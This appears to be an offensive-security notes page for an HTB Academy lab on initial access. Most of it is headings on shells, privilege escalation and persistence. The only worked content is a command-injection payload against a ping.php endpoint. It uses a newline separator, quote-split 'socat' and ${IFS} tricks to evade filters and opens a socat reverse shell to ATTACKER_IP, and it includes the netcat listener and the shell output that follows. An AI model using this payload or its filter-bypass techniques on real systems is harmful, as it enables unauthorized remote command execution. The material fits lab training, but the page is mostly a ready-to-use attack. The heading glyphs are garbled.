πInitial Access
π― Overview
π Reverse Shell Establishment
π§ Socat Reverse Shell (Filter Bypass)
# Base socat command (filtered):
socat TCP4:ATTACKER_IP:PORT EXEC:/bin/bash
# Filter bypass payload:
GET /ping.php?ip=127.0.0.1%0a's'o'c'a't'${IFS}TCP4:ATTACKER_IP:8443${IFS}EXEC:bash
# Explanation:
%0a # Newline character (command separator bypass)
's'o'c'a't' # Single quotes around each character (command bypass)
${IFS} # Environment variable for space bypassπ§ Listener Setup
# Start netcat listener
nc -nvlp 8443
# Expected connection:
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 51496
uid=1004(webdev) gid=1004(webdev) groups=1004(webdev),4(adm)π TTY Upgrade Process
π οΈ Socat Interactive Terminal
π Alternative Python TTY
π Privilege Escalation Discovery
π Audit Log Analysis
π Credential Extraction from Logs
πΊ User Escalation
π Network Position Analysis
π Network Interface Discovery
π― Host Information
π Persistence Preparation
π‘οΈ Access Maintenance Strategy
π Next Steps Planning
π― HTB Academy Lab
π Lab Solution Summary
π Learning Objectives
π‘οΈ Defensive Recommendations
π Application Security
Last updated